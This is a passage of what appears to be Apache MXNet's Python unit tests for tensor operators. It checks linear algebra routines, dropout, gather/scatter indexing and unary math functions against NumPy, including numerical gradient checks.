u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
    # Currently disabled on GPU as these need CUDA 8,
    # while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
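# _syevd_backward is the adjoint of the symmetric eigendecomposition a = u.T @ diag(l) @ u
# (rows of u are eigenvectors, as produced by _syevd_forward). With k = grad_u @ u.T, the
# returned gradient is u.T @ (diag(grad_l) + s) @ u, where s is symmetric with off-diagonal
# entries s[i, j] = (k[i, j] - k[j, i]) / (2 * (l[i] - l[j])); the symmetrization reflects
# the constraint that the input matrix is symmetric.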
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1896893923)
def test_laop_3():
    # Currently disabled on GPU as syevd needs CUDA 8,
    # while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
def test_laop_4():
    # Currently disabled on GPU as syevd needs CUDA 8,
    # while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
                    # test extraction of a triangle by doing a full roundtrip, as the intermediate
                    # extracted triangle has a different ordering than numpy's
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@pytest.mark.skip(reason="Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
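# The invertibility argument in test_laop_6 rests on the matrix determinant lemma,
# det(I + v v^T) = 1 + v^T v. A minimal numpy sketch verifying it (illustrative only,
# not part of the test suite):
def _det_lemma_sketch():
    v = np.random.random(4)
    lhs = np.linalg.det(np.eye(4) + np.outer(v, v))
    rhs = 1. + np.dot(v, v)
    # the two sides agree up to floating point error
    assert abs(lhs - rhs) < 1e-10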
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@pytest.mark.flaky
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
        # Make sure the input contains no zeros (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
        # The relative error should stay within ratio/2
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
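        # duplicate indices accumulate in the backward pass: the values 2 and 3 are both
        # scattered to position (1, 1), giving 5, while position (0, 0) receives only 0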
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
    # check if indices are out of bounds
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
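# np_smooth_l1 and np_smooth_l1_grad are the numpy references for mx.sym.smooth_l1:
#   f(x)  = 0.5 * (sigma * x)^2     if |x| < 1 / sigma^2
#           |x| - 0.5 / sigma^2     otherwise
#   f'(x) = sigma^2 * x             if |x| < 1 / sigma^2
#           sign(x)                 otherwise
# The two branches join with matching value and slope at |x| = 1 / sigma^2.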
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtypes)
# - Backward: Comparison to NumPy (several dtypes)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
    except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
        # Loop over dtypes
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
